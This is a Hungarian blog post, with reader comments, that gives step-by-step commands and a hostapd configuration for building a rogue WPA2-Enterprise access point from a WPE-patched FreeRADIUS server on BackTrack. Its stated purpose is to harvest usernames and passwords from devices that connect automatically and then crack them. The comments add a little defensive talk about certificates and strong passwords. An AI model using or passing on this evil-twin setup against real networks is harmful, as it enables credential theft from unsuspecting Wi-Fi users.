2012. augusztus 10., péntek

WPA2-Enterprise hacked

Ma szórakoztam egy kicsit a Wifi-vel és a következő érdekes eredményre jutottam :
BackTrack 5 R2 :
Előkészületek :

wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.11.tar.bz2
wget http://www.opensecurityresearch.com/files/freeradius-wpe-2.1.11.patch
tar -jxvf freeradius-server-2.1.11.tar.bz2
cd freeradius-server-2.1.11
patch -p1 < freeradius-wpe-2.1.11.patch
./configure
make
make install
cd /usr/local/etc/raddb/certs/
./bootstrap
ldconfig
radiusd -v

(ez volt a Rádiusz szerver installálása)







/usr/local/etc/raddb/proxy.conf  <- kommentbe a következő sorokat : # Sample virtual home server.
home_server virtual.example.com {
virtual_server = virtual.example.com
}
A rádiusz szerver indítása :
radiusd -X

Hotspotad installálása és futtatása :

apt-get install libnl-dev
wget w1.fi/releases/hostapd-1.0.tar.gz
tar -xvzf hostapd-1.0.tar.gz
cd hostapd-1.0/hostapd
cp defconfig .config
vi .configure (ez elől ki kell venni a kommentet : CONFIG_DRIVER_NL80211=y
make
make install









vi hostapd-wpe.conf
interface=wlan1
driver=nl80211
ssid="vallati WiFi ssid"
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=1
wpa_key_mgmt=WPA-EAP
channel=1
wpa_pairwise=TKIP CCMP 

hostapd hostapd-wpe.conf

Ezzel elérjük, hogy fel tudunk konfigurálni egy hamis vállalati Wifi hotspot-ot ami nem pre-shared-key-el autentikál, hanem WPA-enterprise módban. Ennek segítségével be lehet gyűjteni automatikusan kapcsolódó eszközökről a usernév és jelszó információt. További trükkös programokkal a begyűjtött jelszavakat fel is lehet törni.

Ennyit a Wpa2-Enterprise biztonságáról....

9 megjegyzés:

  1. Aztán miért kapcsolódna automatikusan is bárki.?

    VálaszTörlés
    Válaszok
    1. Mert okostelefonokon ezt szokták beállítani - így a legkényelmesebb... (meg pc-ken is a windowsban a default, hogy automatikusan kapcsolódik.) Hát ezért.

      Törlés
  2. És mi a helyzet ha certificate-ekkel autentikál.?

    VálaszTörlés
    Válaszok
    1. Az a legbiztonságosabb megoldás. A baj az szokott lenni, hogy egyéb megfontolásokból általában nem ezt a megoldást használják, hanem inkább a rádius szerver + felhasználónév+jelszó megoldást. AD autentikációval vagy önálló user adatbázissal.
      A tanúsítvány menedzsment (mindenféle eszközökön) meg rudja bonyolítani a dolgokat... A felahsználónév/jelszó használat jóval kevesebb menedzsmentet igényel.

      Törlés
  3. Nemrég raktam openWRT-re freeradius-t, már látom hogy openSSL-el kell generáljak magamnak cert-eket ha nyugodtan akarok aludni :-)
    De tudok olyan helyet, ahol meg LDAP-autentikáció van, mac address szűréssel..
    Bár szerencsére az emberek 99%-ának fogalma sincs mi az hogy BackTrack vagy hogy Kali Linux, arról nem is beszélve, hogy a környéken van elég sok WEP-kódolású is, csesztessék csak azt :-)

    VálaszTörlés
  4. ..közben az is eszembe jutott, hogy ha mondjuk felemelem a sztenderd tíz percről mondjuk 24 órára a radius autentikációs időkorlátot, vagyis hogy egy nap alatt maximum egyszer küldjön ilyen csomagot, azzal is el lehet elcseszni a "hallgatózó" napját eléggé, nem.?

    VálaszTörlés
    Válaszok
    1. Otthoni hálózatnál nem érdemes ezzel vacakolni. Simán elég egy elég hosszú és elég bonyolult jelszó WPA2-es titkosítással. A tudomány mai állása szerint ezt megtörni nem olyan egyszerű... A plusz radius szerver vállalati környezetben használatos inkább. Egy plusz autentikációs faktorként. Otthon ennek nem sok értelmét látom...

      Törlés
  5. Pár hete felvacakoltam openWRT-re, leszedni már nem fogom.. Meg persze ennél is lehet 64 karakteres random jelszó..

    VálaszTörlés
  6. Örülhetsz, kijött az új Kali Linux 1.0.8...

    VálaszTörlés

Megjegyzés: Megjegyzéseket csak a blog tagjai írhatnak a blogba.